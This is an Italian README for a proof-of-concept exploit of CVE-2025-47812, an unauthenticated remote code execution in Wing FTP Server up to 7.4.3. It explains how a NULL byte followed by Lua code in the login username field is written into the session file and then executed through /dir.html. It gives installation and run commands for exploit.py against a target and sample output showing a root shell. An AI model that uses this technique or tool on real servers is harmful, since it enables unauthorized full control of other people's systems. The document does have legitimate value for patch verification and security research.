
Exploit proof-of-concept per CVE-2025-47812: esecuzione remota di codice non autenticata in Wing FTP Server <= 7.4.3 tramite iniezione di byte nulli nel parametro username, fornendo accesso root/SYSTEM.
Vulnerabilità di esecuzione di codice remoto non autenticata in Wing FTP Server <= 7.4.3. Un byte NULL iniettato nel parametro
usernamedurante il login causa la scrittura di codice Lua nel file di sessione. Quando si accede a/dir.htmlcon il cookie di sessione risultante, il codice iniettato viene eseguito — come root su Linux o SYSTEM su Windows.
/loginok.html inietta un byte NULL seguito da codice Lua nel campo username./dir.html con il cookie UID restituito attiva l'esecuzione del codice Lua iniettato.python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit
python3 exploit.py -u http://TARGET
Esempio:
$ python3 exploit.py -u http://10.10.10.10
[*] Targeting http://10.10.10.10
[*] Logging in with injected payload...
[*] Triggering payload...
[+] Target is vulnerable! Command output:
uid=0(root) gid=0(root) groups=0(root)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> whoami
root